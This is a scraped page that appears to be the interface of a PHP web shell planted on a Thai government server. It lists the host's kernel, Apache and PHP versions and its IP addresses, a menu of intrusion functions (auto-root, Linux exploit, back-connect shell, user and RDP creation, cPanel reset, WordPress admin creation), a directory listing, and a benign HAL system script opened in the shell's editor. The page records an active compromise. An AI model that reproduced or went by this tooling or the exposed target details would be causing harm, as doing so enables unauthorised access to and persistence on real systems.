Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
libexec /
scripts /
[ HOME SHELL ]
Name
Size
Permission
Action
linux
[ DIR ]
drwxr-xr-x
hal-dockstation-undock
99
B
-rwxr-xr-x
hal-functions
1.56
KB
-rwxr-xr-x
hal-luks-remove
839
B
-rwxr-xr-x
hal-luks-setup
1.72
KB
-rwxr-xr-x
hal-luks-teardown
1.85
KB
-rwxr-xr-x
hal-system-killswitch-get-powe...
689
B
-rwxr-xr-x
hal-system-killswitch-set-powe...
767
B
-rwxr-xr-x
hal-system-lcd-get-brightness
717
B
-rwxr-xr-x
hal-system-lcd-set-brightness
1.1
KB
-rwxr-xr-x
hal-system-power-hibernate
107
B
-rwxr-xr-x
hal-system-power-reboot
239
B
-rwxr-xr-x
hal-system-power-set-power-sav...
247
B
-rwxr-xr-x
hal-system-power-shutdown
243
B
-rwxr-xr-x
hal-system-power-suspend
105
B
-rwxr-xr-x
hal-system-power-suspend-hybri...
105
B
-rwxr-xr-x
hal-system-wol-enable
553
B
-rwxr-xr-x
hal-system-wol-enabled
482
B
-rwxr-xr-x
hal-system-wol-supported
484
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : hal-luks-teardown
#!/bin/bash # Copyright (C) 2005 W. Michael Petullo <mike@flyn.org> # Copyright (C) 2006 David Zeuthen <davidz@redhat.com> # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License version 2. . hal-functions locked_out() { echo "org.freedesktop.Hal.Device.InterfaceLocked" >&2 echo "Enclosing drive/volume is locked" >&2 exit 1 } unknown_error() { echo "org.freedesktop.Hal.Device.UnknownError" >&2 echo "Missing or empty environment variable(s)." >&2 echo "This script should be started by hald." >&2 exit 1 } # Check for environment variables if [ -z "$HAL_PROP_BLOCK_DEVICE" ] || [ -z "$HAL_PROP_INFO_UDI" ] || [ -z "$HAL_PROP_VOLUME_UUID" ] ; then unknown_error fi # Respect the same locks as Mount()/Unmount() etc. if [ -n "$HAL_METHOD_INVOKED_BY_SYSTEMBUS_CONNECTION_NAME" ] ; then hal-is-caller-locked-out --udi $HAL_PROP_INFO_UDI \ --interface org.freedesktop.Hal.Device.Volume \ --caller "$HAL_METHOD_INVOKED_BY_SYSTEMBUS_CONNECTION_NAME" RET=$? if [ "$RET" != "0" ] ; then locked_out fi hal-is-caller-locked-out --udi $HAL_PROP_BLOCK_STORAGE_DEVICE \ --interface org.freedesktop.Hal.Device.Storage \ --caller "$HAL_METHOD_INVOKED_BY_SYSTEMBUS_CONNECTION_NAME" RET=$? if [ "$RET" != "0" ] ; then locked_out fi fi # TODO: this is a little sketchy; we should check for hal-storage-crypto-teardown-others? # IS_HOTPLUGGABLE=`hal-get-property --udi $HAL_PROP_BLOCK_STORAGE_DEVICE --key storage.hotpluggable` if [ "$IS_HOTPLUGGABLE" == "true" ] ; then ACTION="org.freedesktop.hal.storage.crypto-setup-removable" elif [ "$IS_HOTPLUGGABLE" == "false" ] ; then ACTION="org.freedesktop.hal.storage.crypto-setup-fixed" else unknown_error fi hal_check_priv $ACTION hal_exec_backend
Close